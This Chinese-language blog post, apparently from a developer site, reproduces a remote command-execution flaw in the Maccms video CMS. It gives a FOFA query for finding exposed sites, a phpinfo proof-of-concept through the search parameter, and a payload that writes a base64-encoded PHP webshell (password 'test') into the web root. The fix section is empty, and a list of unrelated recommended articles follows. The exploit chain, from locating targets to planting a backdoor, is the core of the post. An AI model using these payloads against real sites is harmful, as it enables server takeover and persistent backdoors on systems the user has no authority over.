【漏洞复现】maccms苹果cms 命令执行漏洞

漏洞描述

感谢提供更多信息。"苹果CMS" 似乎是指 "Maccms",这是一款开源的内容管理系统,主要用于搭建视频网站。Maccms 提供了一套完整的解决方案,包括用户管理、视频上传、分类管理、数据统计等功能,使用户能够方便地创建和管理自己的视频网站。

搜索页面搜索参数过滤不严 导致直接eval执行PHP语句,前台命令执行可getshell

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa app="maccms"

漏洞复现

复制代码
poc  post 请求
http://ip/index.php?m=vod-search&wd={if-A:phpinfo()}{endif-A}

a=phpinfo()

写入网站根目录一句话木马文件payload(文件名:test.php,密码:test)

http://0-sec.org/index.php?m=vod-search&wd={if-A:print(fputs%28fopen%28base64_decode%28dGVzdC5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW3Rlc3RdKTsgPz4%29%29)}{endif-A

修复方案

相关推荐
薄荷椰果抹茶6 小时前
【网络安全基础】第六章---Web安全需求
安全·web安全
游戏开发爱好者814 小时前
iOS重构期调试实战:架构升级中的性能与数据保障策略
websocket·网络协议·tcp/ip·http·网络安全·https·udp
HumanRisk14 小时前
降低网络安全中的人为风险:以人为本的路径
网络·安全·web安全
安全系统学习16 小时前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
江苏思维驱动智能研究院有限公司19 小时前
Sophos 网络安全:全球领先的自适应安全解决方案提供商
网络·安全·web安全
A5rZ20 小时前
Puppeteer 相关漏洞-- Google 2025 Sourceless
网络安全
Bruce_Liuxiaowei1 天前
常见高危端口风险分析与防护指南
网络·网络安全·端口·信息搜集
2501_916013741 天前
iOS 多线程导致接口乱序?抓包还原 + 请求调度优化实战
websocket·网络协议·tcp/ip·http·网络安全·https·udp
头发那是一根不剩了1 天前
双因子认证(2FA)是什么?从零设计一个安全的双因子登录接口
网络安全·系统设计·身份认证
浩浩测试一下1 天前
渗透信息收集- Web应用漏洞与指纹信息收集以及情报收集
android·前端·安全·web安全·网络安全·安全架构